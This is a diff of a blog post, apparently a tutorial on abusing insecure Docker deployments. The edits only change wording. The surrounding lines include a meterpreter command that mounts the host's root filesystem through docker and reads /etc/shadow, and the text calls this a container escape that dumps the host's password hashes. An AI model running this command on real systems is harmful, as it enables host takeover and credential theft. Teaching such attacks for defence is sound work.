opsxcq/blog/content/post/abusing-insecure-docker-deployments.md

 meterpreter >
 ```

-And finally using docker to have access to the host file system.
+And finally, using docker to have access to the host file system.

 ``` shell
 execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"
 ```

-And that is it, you escaped the container and dumped the machine local user
+And that is it, you've escaped the container and dumped the machine local user
 hashes, the output will look like:

 ``` shell